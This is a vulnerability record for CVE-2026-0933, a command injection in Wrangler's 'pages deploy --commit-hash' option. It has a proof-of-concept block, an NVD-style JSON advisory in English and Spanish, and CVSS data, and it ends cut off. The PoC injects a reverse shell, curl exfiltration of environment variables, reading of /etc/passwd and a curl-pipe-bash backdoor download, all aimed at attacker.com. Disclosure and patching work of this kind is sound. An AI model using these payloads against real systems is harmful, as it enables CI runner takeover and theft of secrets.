CVE-2026-0933

# CVE-2026-0933 PoC - Wrangler pages deploy Command Injection # Target: wrangler pages deploy --commit-hash parameter # Example 1: Basic command execution wrangler pages deploy ./dist --commit-hash '$(whoami)' # Example 2: Reverse shell connection wrangler pages deploy ./dist --commit-hash '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)' # Example 3: Exfiltrate environment variables wrangler pages deploy ./dist --commit-hash '$(curl https://attacker.com/exfil?$(env|base64))' # Example 4: Read sensitive files wrangler pages deploy ./dist --commit-hash '$(cat /etc/passwd)' # Example 5: Download and execute backdoor wrangler pages deploy ./dist --commit-hash '$(curl http://attacker.com/backdoor.sh|bash)' # Note: This PoC demonstrates the vulnerability for authorized security testing only

{"cve": {"id": "CVE-2026-0933", "sourceIdentifier": "[email protected]", "published": "2026-01-20T23:16:06.043", "lastModified": "2026-01-27T21:12:28.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SummaryA command injection vulnerability (CWE-78) has been found to exist in the `wrangler pages deploy` command. The issue occurs because the `--commit-hash` parameter is passed directly to a shell command without proper validation or sanitization, allowing an attacker with control of `--commit-hash` to execute arbitrary commands on the system running Wrangler.\n\n\n\n\nRoot causeThe commitHash variable, derived from user input via the --commit-hash CLI argument, is interpolated directly into a shell command using template literals (e.g.,  execSync(`git show -s --format=%B ${commitHash}`)). Shell metacharacters are interpreted by the shell, enabling command execution.\n\n\n\n\nImpactThis vulnerability is generally hard to exploit, as it requires --commit-hash to be attacker controlled. The vulnerability primarily affects CI/CD environments where `wrangler pages deploy` is used in automated pipelines and the \n\n--commit-hash parameter is populated from external, potentially untrusted sources. An attacker could exploit this to:\n\n * Run any shell command.\n * Exfiltrate environment variables.\n * Compromise the CI runner to install backdoors or modify build artifacts.\n\n\n\nCredits Disclosed responsibly by kny4hacker.\n\n\n\n\nMitigation\n * Wrangler v4 users are requested to upgrade to Wrangler v4.59.1 or higher.\n * Wrangler v3 users are requested to upgrade to Wrangler v3.114.17 or higher.\n * Users on Wrangler v2 (EOL) should upgrade to a supported major version."}, {"lang": "es", "value": "Resumen\nSe ha encontrado una vulnerabilidad de inyección de comandos (CWE-78) que existe en el comando 'wrangler pages deploy'. El problema ocurre porque el parámetro --commit-hash se pasa directamente a un comando de shell sin la validación o sanitización adecuadas, permitiendo a un atacante con control de --commit-hash ejecutar comandos arbitrarios en el sistema que ejecuta Wrangler.\n\nCausa raíz\nLa variable commitHash, derivada de la entrada del usuario a través del argumento CLI --commit-hash, se interpola directamente en un comando de shell usando literales de plantilla (p. ej., execSync('git show -s --format=%B ${commitHash}')). Los metacaracteres de shell son interpretados por el shell, lo que permite la ejecución de comandos.\n\nImpacto\nEsta vulnerabilidad es generalmente difícil de exploit, ya que requiere que --commit-hash esté controlado por el atacante. La vulnerabilidad afecta principalmente a entornos CI/CD donde 'wrangler pages deploy' se utiliza en pipelines automatizados y el parámetro --commit-hash se rellena desde fuentes externas, potencialmente no confiables. Un atacante podría exploit esto para:\n\n * Ejecutar cualquier comando de shell.\n * Exfiltrar variables de entorno.\n * Comprometer el ejecutor de CI para instalar puertas traseras o modificar artefactos de compilación.\n\nCréditos\nDivulgado de forma responsable por kny4hacker.\n\nMitigación\n * Se solicita a los usuarios de Wrangler v4 que actualicen a Wrangler v4.59.1 o superior.\n * Se solicita a los usuarios de Wrangler v3 que actualicen a Wrangler v3.114.17 o superior.\n * Los usuarios de Wrangler v2 (EOL) deben actualizar a una versión principal compatible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DE ... (truncated)